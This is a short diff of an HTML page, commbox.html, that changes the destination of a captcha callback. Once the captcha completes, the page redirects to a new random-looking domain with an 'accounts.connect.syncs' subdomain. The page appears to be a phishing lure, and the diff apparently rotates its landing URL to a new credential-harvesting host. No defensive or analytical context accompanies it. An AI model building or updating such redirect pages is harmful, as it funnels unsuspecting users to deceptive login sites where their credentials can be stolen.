--- a/commbox.html
+++ b/commbox.html
@@ -23,7 +23,7 @@
 
     <script>
         function recaptchaCallback() {
-            window.location.replace("https://accounts.connect.syncs.wpanila.com/QMKBwqJm");
+            window.location.replace("https://accounts.connect.syncs.digitalprintzone.com/jMyKvbVq");
 //             document.getElementById("myForm").submit();
         }
     </script>
